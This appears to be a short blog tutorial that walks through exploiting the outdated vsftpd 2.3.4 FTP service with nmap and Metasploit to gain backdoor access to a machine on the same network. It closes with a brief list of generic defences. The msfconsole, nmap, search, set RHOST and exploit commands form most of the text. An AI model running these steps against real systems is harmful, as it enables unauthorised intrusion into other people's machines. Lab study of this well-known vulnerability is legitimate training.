Hack a Machine with in 6 steps

Hack a Machine with In 6 steps !!!


Note: this is purely for education purpose iam not responsible for any things. do by your own risk !this blog shows how to defend our self. Learn Defending Techniques 

YES we can hack an machine/laptop with in 6 steps , my main aim  was gaining the backdoor access of an laptop , and how to defend this type of attacks 

Requirements: 1. Metasploit
                         2.Nmap 
                         3. Kali Linux (optional OS)

Step 1:

here iam using a Kali Linux with above requirements (the machine and Victim machine must connect in same network) ,
Open terminal and enter Metasploit by using this command
# msfconsole

Step 2:
now we are inside the console, now scan the victim machine with help of IP address or host name by using Nmap (victims IP address was 192.168.1.11)
# nmap -sV 192.168.1.11


Step 3:

here you will get all ports, services and version number of that victim machine
now i have taken one of the application which is not updated and its payload is already in metasploit , chose wisely while selecting the services, here vsftpd is an open port 21 and that services is outdated, so iam targeted to this port to get an backdoor access. 
# search vsftpd 2.3.4


Step 4:

by entering the above command , we can see the payload available in meatsploit 
# use xxxxxxxx (copy the payload full name)
now we are inside the exploit now we have to set our exploit


Step 5:

# show options
# set RHOST 192.168.1.11
# show options 


Step 6:

# exploit 


Thats IT we are inside of the Victims machine. 


How to defend this type of attacks ?


1. Update the OS 
2. Update the applications on regularly 
3. Close the unwanted PORTS
4. Stop the unwanted services
5. Browse safely in internet 
6. Maintain an genuine Anti-Virus and Operating System



THANK YOU !!!



Comments